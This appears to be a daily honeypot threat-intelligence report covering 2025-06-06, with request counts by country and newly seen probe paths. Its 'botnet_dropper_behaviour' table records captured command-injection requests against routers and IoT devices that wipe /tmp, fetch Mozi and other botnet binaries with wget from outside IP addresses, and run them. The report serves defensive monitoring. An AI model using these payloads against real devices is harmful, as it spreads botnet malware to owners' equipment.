Skip to main content
  1. Daily-Posts/

Report: 2025-06-06

·408 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-06
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 19 new requests that have never been observed before (these were added to the monitored request database.).

A total of 847 requests were recorded during the day, originating from 6 different countries, with a peak of 208 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
DEGermany
USGermany
BRGermany
USGermany
SGGermany
DEGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
116.97.180.214GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.62/jaws;sh+/tmp/jaws HTTP/1.1
45.115.89.82GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.207.125.9227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
117.199.229.195GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
141.98.11.147POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3Bkillall -9 arm7%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
141.98.11.147pingAddr=%7cecho%20%24(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.26.90.251%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20xpon)&wanif=130816

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
323GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1
413Get /login.asp HTTP/1.1
443POST /boaform/Ping6Config HTTP/1.1
1161GET /Templates/LoginPage.html/env HTTP/1.0
1331GET /wwwSiemens/actuator/env HTTP/1.1
1471GET /XCmU HTTP/1.1
1481GET /2bdd HTTP/1.1
1711GET /Odin/http/call1749189596 HTTP/1.1
1721GET /OdinHttpCall1749189596 HTTP/1.1
1731GET /odinhttpcall1749189596 HTTP/1.1
1901GET /php/login.php HTTP/1.1
2221GET /Odin/http/call1749185871 HTTP/1.1
2231GET /OdinHttpCall1749185871 HTTP/1.1
2241GET /odinhttpcall1749185871 HTTP/1.1
2381GET /php_info HTTP/1.1
2751GET /FormLogin/env HTTP/1.1
2881GET /FormLogin/actuator/env HTTP/1.1
2891GET /Templates/LoginPage.html/actuator/env HTTP/1.0
2901GET /wwwSiemens/env HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0208US
1145BG
2102DE
385NL
442JP
534GB
625LT
720NG
816SC
915BD
1014PL
1111CA
1210GH
1310FR
149UA
158CH
168SG
177PT
186IN
196HK
206KR
216MX
225ZA
235VN
245BE
254TR
264IL
274ES
284RU
293ID
303BR
313KZ
322BY
332AO
342KW
352PA
362IE
371MC
381IR
391CN
401DK

Related

Report: 2025-06-05
·513 words
Repport Daily
Report: 2025-06-04
·486 words
Repport Daily
Report: 2025-06-03
·683 words
Repport Daily